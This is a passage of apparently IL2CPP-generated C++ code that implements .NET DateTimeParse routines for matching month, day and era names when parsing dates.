argument*/NULL); if (!L_11) { goto IL_0056; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_12 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_13 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_12, 2, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_13) { goto IL_006e; } } { return (bool)0; } IL_0056: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_14 = ___str0; int32_t* L_15 = L_14->get_address_of_Index_1(); int32_t* L_16 = L_15; int32_t L_17 = *((int32_t*)L_16); *((int32_t*)L_16) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_17, (int32_t)1)); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_18 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_19 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_18, 2, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_19) { goto IL_006e; } } { return (bool)0; } IL_006e: { int32_t L_20 = V_2; if ((((int32_t)L_20) < ((int32_t)0))) { goto IL_0077; } } { int32_t L_21 = V_2; if ((((int32_t)L_21) < ((int32_t)((int32_t)60)))) { goto IL_0079; } } IL_0077: { return (bool)0; } IL_0079: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_22 = ___result2; int32_t L_23 = V_1; int32_t L_24 = V_2; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_25; memset(&L_25, 0, sizeof(L_25)); TimeSpan__ctor_m44268277AFF84DEF6CA3442907CE8116A982FB87((&L_25), L_23, L_24, 0, /*hidden argument*/NULL); *(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_22 = L_25; bool L_26 = V_0; if (L_26) { goto IL_0096; } } { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_27 = ___result2; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_28 = ___result2; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_29 = TimeSpan_Negate_m0DC5231DD5489EB3A8A7AE9AC30F83CBD3987C33((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_28, /*hidden argument*/NULL); *(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_27 = L_29; } IL_0096: { return (bool)1; } } // System.Boolean System.DateTimeParse::MatchAbbreviatedMonthName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchAbbreviatedMonthName_m347D9553C124F81EBCD0A0568F36463A02189A15 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; String_t* V_3 = NULL; int32_t V_4 = 0; int32_t V_5 = 0; int32_t G_B4_0 = 0; bool G_B8_0 = false; { V_0 = 0; int32_t* L_0 = ___result2; *((int32_t*)L_0) = (int32_t)(-1); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; bool L_2 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, /*hidden argument*/NULL); if (!L_2) { goto IL_008c; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = ___dtfi1; String_t* L_4 = DateTimeFormatInfo_GetMonthName_m442F6260E03F4C61CE83A7DE211B62EB88678DDC(L_3, ((int32_t)13), /*hidden argument*/NULL); int32_t L_5 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_4, /*hidden argument*/NULL); if (!L_5) { goto IL_0020; } } { G_B4_0 = ((int32_t)13); goto IL_0022; } IL_0020: { G_B4_0 = ((int32_t)12); } IL_0022: { V_1 = G_B4_0; V_2 = 1; goto IL_0063; } IL_0027: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_6 = ___dtfi1; int32_t L_7 = V_2; String_t* L_8 = DateTimeFormatInfo_GetAbbreviatedMonthName_m5C71C0AB3BCCD6AE4C17104BCB4D2F65759E9D06(L_6, L_7, /*hidden argument*/NULL); V_3 = L_8; String_t* L_9 = V_3; int32_t L_10 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_9, /*hidden argument*/NULL); V_4 = L_10; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi1; bool L_12 = DateTimeFormatInfo_get_HasSpacesInMonthNames_mAAB2BD50D0EA1824848EA8B0047ADF82E02AB7B9(L_11, /*hidden argument*/NULL); if (L_12) { goto IL_0048; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_13 = ___str0; String_t* L_14 = V_3; bool L_15 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_13, L_14, /*hidden argument*/NULL); G_B8_0 = L_15; goto IL_0052; } IL_0048: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_16 = ___str0; String_t* L_17 = V_3; bool L_18 = __DTString_MatchSpecifiedWords_mAD172D28B54FDBB34D5E8C8F92CB6C8B0EECDBA0((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_16, L_17, (bool)0, (int32_t*)(&V_4), /*hidden argument*/NULL); G_B8_0 = L_18; } IL_0052: { if (!G_B8_0) { goto IL_005f; } } { int32_t L_19 = V_4; int32_t L_20 = V_0; if ((((int32_t)L_19) <= ((int32_t)L_20))) { goto IL_005f; } } { int32_t L_21 = V_4; V_0 = L_21; int32_t* L_22 = ___result2; int32_t L_23 = V_2; *((int32_t*)L_22) = (int32_t)L_23; } IL_005f: { int32_t L_24 = V_2; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_24, (int32_t)1)); } IL_0063: { int32_t L_25 = V_2; int32_t L_26 = V_1; if ((((int32_t)L_25) <= ((int32_t)L_26))) { goto IL_0027; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_27 = ___dtfi1; int32_t L_28 = DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731(L_27, /*hidden argument*/NULL); if (!((int32_t)((int32_t)L_28&(int32_t)2))) { goto IL_008c; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_29 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_30 = ___dtfi1; StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_31 = DateTimeFormatInfo_internalGetLeapYearMonthNames_m2C9F72E749A85E6842B45DE3146D0CDDCBB58C92(L_30, /*hidden argument*/NULL); int32_t L_32 = __DTString_MatchLongestWords_mCEDB8993665810AAB06045D6EFF076B89572C4BF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_29, L_31, (int32_t*)(&V_0), /*hidden argument*/NULL); V_5 = L_32; int32_t L_33 = V_5; if ((((int32_t)L_33) < ((int32_t)0))) { goto IL_008c; } } { int32_t* L_34 = ___result2; int32_t L_35 = V_5; *((int32_t*)L_34) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_35, (int32_t)1)); } IL_008c: { int32_t* L_36 = ___result2; int32_t L_37 = *((int32_t*)L_36); if ((((int32_t)L_37) <= ((int32_t)0))) { goto IL_00a0; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_38 = ___str0; int32_t* L_39 = L_38->get_address_of_Index_1(); int32_t* L_40 = L_39; int32_t L_41 = *((int32_t*)L_40); int32_t L_42 = V_0; *((int32_t*)L_40) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_41, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_42, (int32_t)1)))); return (bool)1; } IL_00a0: { return (bool)0; } } // System.Boolean System.DateTimeParse::MatchMonthName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchMonthName_mB1C51508CD0064B05AA17E5C6468ADDBD222656D (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; String_t* V_3 = NULL; int32_t V_4 = 0; int32_t V_5 = 0; int32_t V_6 = 0; int32_t G_B4_0 = 0; bool G_B8_0 = false; { V_0 = 0; int32_t* L_0 = ___result2; *((int32_t*)L_0) = (int32_t)(-1); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; bool L_2 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, /*hidden argument*/NULL); if (!L_2) { goto IL_00b4; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = ___dtfi1; String_t* L_4 = DateTimeFormatInfo_GetMonthName_m442F6260E03F4C61CE83A7DE211B62EB88678DDC(L_3, ((int32_t)13), /*hidden argument*/NULL); int32_t L_5 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_4, /*hidden argument*/NULL); if (!L_5) { goto IL_0023; } } { G_B4_0 = ((int32_t)13); goto IL_0025; } IL_0023: { G_B4_0 = ((int32_t)12); } IL_0025: { V_1 = G_B4_0; V_2 = 1; goto IL_0066; } IL_002a: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_6 = ___dtfi1; int32_t L_7 = V_2; String_t* L_8 = DateTimeFormatInfo_GetMonthName_m442F6260E03F4C61CE83A7DE211B62EB88678DDC(L_6, L_7, /*hidden argument*/NULL); V_3 = L_8; String_t* L_9 = V_3; int32_t L_10 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_9, /*hidden argument*/NULL); V_4 = L_10; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi1; bool L_12 = DateTimeFormatInfo_get_HasSpacesInMonthNames_mAAB2BD50D0EA1824848EA8B0047ADF82E02AB7B9(L_11, /*hidden argument*/NULL); if (L_12) { goto IL_004b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_13 = ___str0; String_t* L_14 = V_3; bool L_15 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_13, L_14, /*hidden argument*/NULL); G_B8_0 = L_15; goto IL_0055; } IL_004b: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_16 = ___str0; String_t* L_17 = V_3; bool L_18 = __DTString_MatchSpecifiedWords_mAD172D28B54FDBB34D5E8C8F92CB6C8B0EECDBA0((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_16, L_17, (bool)0, (int32_t*)(&V_4), /*hidden argument*/NULL); G_B8_0 = L_18; } IL_0055: { if (!G_B8_0) { goto IL_0062; } } { int32_t L_19 = V_4; int32_t L_20 = V_0; if ((((int32_t)L_19) <= ((int32_t)L_20))) { goto IL_0062; } } { int32_t L_21 = V_4; V_0 = L_21; int32_t* L_22 = ___result2; int32_t L_23 = V_2; *((int32_t*)L_22) = (int32_t)L_23; } IL_0062: { int32_t L_24 = V_2; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_24, (int32_t)1)); } IL_0066: { int32_t L_25 = V_2; int32_t L_26 = V_1; if ((((int32_t)L_25) <= ((int32_t)L_26))) { goto IL_002a; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_27 = ___dtfi1; int32_t L_28 = DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731(L_27, /*hidden argument*/NULL); if (!((int32_t)((int32_t)L_28&(int32_t)1))) { goto IL_008f; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_29 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_30 = ___dtfi1; StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_31 = DateTimeFormatInfo_get_MonthGenitiveNames_m249A57C68A09D5EE6771DCB4A0D5D1EE9CEE78E4(L_30, /*hidden argument*/NULL); int32_t L_32 = __DTString_MatchLongestWords_mCEDB8993665810AAB06045D6EFF076B89572C4BF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_29, L_31, (int32_t*)(&V_0), /*hidden argument*/NULL); V_5 = L_32; int32_t L_33 = V_5; if ((((int32_t)L_33) < ((int32_t)0))) { goto IL_008f; } } { int32_t* L_34 = ___result2; int32_t L_35 = V_5; *((int32_t*)L_34) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_35, (int32_t)1)); } IL_008f: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_36 = ___dtfi1; int32_t L_37 = DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731(L_36, /*hidden argument*/NULL); if (!((int32_t)((int32_t)L_37&(int32_t)2))) { goto IL_00b4; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_38 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_39 = ___dtfi1; StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_40 = DateTimeFormatInfo_internalGetLeapYearMonthNames_m2C9F72E749A85E6842B45DE3146D0CDDCBB58C92(L_39, /*hidden argument*/NULL); int32_t L_41 = __DTString_MatchLongestWords_mCEDB8993665810AAB06045D6EFF076B89572C4BF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_38, L_40, (int32_t*)(&V_0), /*hidden argument*/NULL); V_6 = L_41; int32_t L_42 = V_6; if ((((int32_t)L_42) < ((int32_t)0))) { goto IL_00b4; } } { int32_t* L_43 = ___result2; int32_t L_44 = V_6; *((int32_t*)L_43) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_44, (int32_t)1)); } IL_00b4: { int32_t* L_45 = ___result2; int32_t L_46 = *((int32_t*)L_45); if ((((int32_t)L_46) <= ((int32_t)0))) { goto IL_00c8; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_47 = ___str0; int32_t* L_48 = L_47->get_address_of_Index_1(); int32_t* L_49 = L_48; int32_t L_50 = *((int32_t*)L_49); int32_t L_51 = V_0; *((int32_t*)L_49) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_50, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_51, (int32_t)1)))); return (bool)1; } IL_00c8: { return (bool)0; } } // System.Boolean System.DateTimeParse::MatchAbbreviatedDayName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchAbbreviatedDayName_m618C84891A479DEDF2B78D5CD7A8691C72A2FB0B (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; String_t* V_2 = NULL; int32_t V_3 = 0; bool G_B5_0 = false; { V_0 = 0; int32_t* L_0 = ___result2; *((int32_t*)L_0) = (int32_t)(-1); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; bool L_2 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, /*hidden argument*/NULL); if (!L_2) { goto IL_004e; } } { V_1 = 0; goto IL_004a; } IL_0011: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = ___dtfi1; int32_t L_4 = V_1; String_t* L_5 = DateTimeFormatInfo_GetAbbreviatedDayName_m31D50EB7EF2ED3E7F0F72C14498427D8E7799D43(L_3, L_4, /*hidden argument*/NULL); V_2 = L_5; String_t* L_6 = V_2; int32_t L_7 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_6, /*hidden argument*/NULL); V_3 = L_7; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = ___dtfi1; bool L_9 = DateTimeFormatInfo_get_HasSpacesInDayNames_mE48415D8A2AD4A3C4B1008743D7646244C51D601(L_8, /*hidden argument*/NULL); if (L_9) { goto IL_0031; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str0; String_t* L_11 = V_2; bool L_12 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_10, L_11, /*hidden argument*/NULL); G_B5_0 = L_12; goto IL_003b; } IL_0031: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_13 = ___str0; String_t* L_14 = V_2; bool L_15 = __DTString_MatchSpecifiedWords_mAD172D28B54FDBB34D5E8C8F92CB6C8B0EECDBA0((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_13, L_14, (bool)0, (int32_t*)(&V_3), /*hidden argument*/NULL); G_B5_0 = L_15; } IL_003b: { if (!G_B5_0) { goto IL_0046; } } { int32_t L_16 = V_3; int32_t L_17 = V_0; if ((((int32_t)L_16) <= ((int32_t)L_17))) { goto IL_0046; } } { int32_t L_18 = V_3; V_0 = L_18; int32_t* L_19 = ___result2; int32_t L_20 = V_1; *((int32_t*)L_19) = (int32_t)L_20; } IL_0046: { int32_t L_21 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_21, (int32_t)1)); } IL_004a: { int32_t L_22 = V_1; if ((((int32_t)L_22) <= ((int32_t)6))) { goto IL_0011; } } IL_004e: { int32_t* L_23 = ___result2; int32_t L_24 = *((int32_t*)L_23); if ((((int32_t)L_24) < ((int32_t)0))) { goto IL_0062; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_25 = ___str0; int32_t* L_26 = L_25->get_address_of_Index_1(); int32_t* L_27 = L_26; int32_t L_28 = *((int32_t*)L_27); int32_t L_29 = V_0; *((int32_t*)L_27) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_28, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_29, (int32_t)1)))); return (bool)1; } IL_0062: { return (bool)0; } } // System.Boolean System.DateTimeParse::MatchDayName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchDayName_mD95E4FCC4500803D388819713034C5B32EEEB40B (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; String_t* V_2 = NULL; int32_t V_3 = 0; bool G_B5_0 = false; { V_0 = 0; int32_t* L_0 = ___result2; *((int32_t*)L_0) = (int32_t)(-1); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; bool L_2 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, /*hidden argument*/NULL); if (!L_2) { goto IL_004e; } } { V_1 = 0; goto IL_004a; } IL_0011: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = ___dtfi1; int32_t L_4 = V_1; String_t* L_5 = DateTimeFormatInfo_GetDayName_m82CF60408D75B103DAFF96575B257EFFA80569AF(L_3, L_4, /*hidden argument*/NULL); V_2 = L_5; String_t* L_6 = V_2; int32_t L_7 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_6, /*hidden argument*/NULL); V_3 = L_7; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = ___dtfi1; bool L_9 = DateTimeFormatInfo_get_HasSpacesInDayNames_mE48415D8A2AD4A3C4B1008743D7646244C51D601(L_8, /*hidden argument*/NULL); if (L_9) { goto IL_0031; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str0; String_t* L_11 = V_2; bool L_12 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_10, L_11, /*hidden argument*/NULL); G_B5_0 = L_12; goto IL_003b; } IL_0031: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_13 = ___str0; String_t* L_14 = V_2; bool L_15 = __DTString_MatchSpecifiedWords_mAD172D28B54FDBB34D5E8C8F92CB6C8B0EECDBA0((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_13, L_14, (bool)0, (int32_t*)(&V_3), /*hidden argument*/NULL); G_B5_0 = L_15; } IL_003b: { if (!G_B5_0) { goto IL_0046; } } { int32_t L_16 = V_3; int32_t L_17 = V_0; if ((((int32_t)L_16) <= ((int32_t)L_17))) { goto IL_0046; } } { int32_t L_18 = V_3; V_0 = L_18; int32_t* L_19 = ___result2; int32_t L_20 = V_1; *((int32_t*)L_19) = (int32_t)L_20; } IL_0046: { int32_t L_21 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_21, (int32_t)1)); } IL_004a: { int32_t L_22 = V_1; if ((((int32_t)L_22) <= ((int32_t)6))) { goto IL_0011; } } IL_004e: { int32_t* L_23 = ___result2; int32_t L_24 = *((int32_t*)L_23); if ((((int32_t)L_24) < ((int32_t)0))) { goto IL_0062; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_25 = ___str0; int32_t* L_26 = L_25->get_address_of_Index_1(); int32_t* L_27 = L_26; int32_t L_28 = *((int32_t*)L_27); int32_t L_29 = V_0; *((int32_t*)L_27) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_28, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_29, (int32_t)1)))); return (bool)1; } IL_0062: { return (bool)0; } } // System.Boolean System.DateTimeParse::MatchEraName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchEraName_mF26765E6FE328C642E3F4BE8012D2B432F607E27 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method) { Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* V_0 = NULL; int32_t V_1 = 0; String_t* V_2 = NULL; { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; bool L_1 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, /*hidden argument*/NULL); if (!L_1) { goto IL_007d; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = ___dtfi1; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_3 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_2, /*hidden argument*/NULL); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_4 = VirtFuncInvoker0< Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* >::Invoke(15 /* System.Int32[] System.Globalization.Calendar::get_Eras() */, L_3); V_0 = L_4; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_5 = V_0; if (!L_5) { goto IL_007d; } } { V_1 = 0; goto IL_0077; } IL_001b: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_6 = ___dtfi1; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_7 = V_0; int32_t L_8 = V_1; int32_t L_9 = L_8; int32_t L_10 = (L_7)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_9)); String_t* L_11 = DateTimeFormatInfo_GetEraName_mA4F71726B4A0780F732E56EE4876DCDF7EA2EB38(L_6, L_10, /*hidden argument*/NULL); V_2 = L_11; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_12 = ___str0; String_t* L_13 = V_2; bool L_14 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_12, L_13, /*hidden argument*/NULL); if (!L_14) { goto IL_0047; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_15 = ___str0; int32_t* L_16 = L_15->get_address_of_Index_1(); int32_t* L_17 = L_16; int32_t L_18 = *((int32_t*)L_17); String_t* L_19 = V_2; int32_t L_20 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_19, /*hidden argument*/NULL); *((int32_t*)L_17) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_18, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_20, (int32_t)1)))); int32_t* L_21 = ___result2; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_22 = V_0; int32_t L_23 = V_1; int32_t L_24 = L_23; int32_t L_25 = (L_22)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_24)); *((int32_t*)L_21) = (int32_t)L_25; return (bool)1; } IL_0047: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_26 = ___dtfi1; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_27 = V_0; int32_t L_28 = V_1; int32_t L_29 = L_28; int32_t L_30 = (L_27)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_29)); String_t* L_31 = DateTimeFormatInfo_GetAbbreviatedEraName_m8096A35954A22E28951B8DDDB1BE4B1CD831D7C4(L_26, L_30, /*hidden argument*/NULL); V_2 = L_31; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_32 = ___str0; String_t* L_33 = V_2; bool L_34 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_32, L_33, /*hidden argument*/NULL); if (!L_34) { goto IL_0073; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_35 = ___str0; int32_t* L_36 = L_35->get_address_of_Index_1(); int32_t* L_37 = L_36; int32_t L_38 = *((int32_t*)L_37); String_t* L_39 = V_2; int32_t L_40 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_39, /*hidden argument*/NULL); *((int32_t*)L_37) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_38, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_40, (int32_t)1)))); int32_t* L_41 = ___result2; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_42 = V_0; int32_t L_43 = V_1; int32_t L_44 = L_43; int32_t L_45 = (L_42)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_44)); *((int32_t*)L_41) = (int32_t)L_45; return (bool)1; } IL_0073: { int32_t L_46 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_46, (int32_t)1)); } IL_0077: { int32_t L_47 = V_1; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_48 = V_0; if ((((int32_t)L_47) < ((int32_t)(((int32_t)((int32_t)(((RuntimeArray *)L_48)->max_length))))))) { goto IL_001b; } } IL_007d: { return (bool)0; } } // System.Boolean 